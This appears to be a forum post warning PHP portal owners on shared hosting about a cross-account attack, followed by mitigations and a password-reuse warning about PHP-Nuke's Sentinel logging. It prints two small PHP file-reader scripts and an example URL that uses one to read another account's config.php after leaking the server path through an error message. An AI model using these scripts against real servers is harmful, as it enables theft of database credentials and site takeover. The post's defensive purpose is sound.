If your php portal install in a shared server you must be careful.
Other user that resident in your server (he has a hosting account on your server)can hack your portal!
How he can hack your portal?
By this script(script 1):
Code: Select all
<?php
if (isset($a) )
{
echo implode("", file("$a"));
}
?>Code: Select all
<?php
header('Content-Type: text/plain');
readfile($_GET['a']);
?>1- hacker must know your ID in your hosting so he recall one of php files that belong your portal in his browser:
for example:
Code: Select all
http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=textCode: Select all
/home/yourID/public_html/forum/includes/functions.php error 607 in line 5632- Now he use one of these script for exam script 1 like in this case:
Code: Select all
http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php3- by using a simple script he can download your db or he can write in your db and …
he can install the same portal and edit and change some code then he can use your encrypted-admin-password and login some times and…
how we can solve this problem?
1- we must add this codes to prologue of all php files:
Code: Select all
ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');2- You must rename your config.php file and edit all php file which include or require config.php file. Then you must encrypt these files by using zend-phpencoder or any other encoder programs.
So if a hacker find your ID he will not find your db config file
3- or using a dedicated server only for own.
In phpnuke if using nuke sentinel and IP-trakcer be on then all users' usernames and passwords ( even admin) insert in nuke_nsnst_tracked_ips !!!
So nuke owner or a hacker can see users password.
If you want register in portals you must use different password.
If your password is equal with your other important thing for exam equal with your email pass or domain-panel pass or your bank account hacker or nuke website owner can access that!
In other portals, owner can change scripts codes and find your password.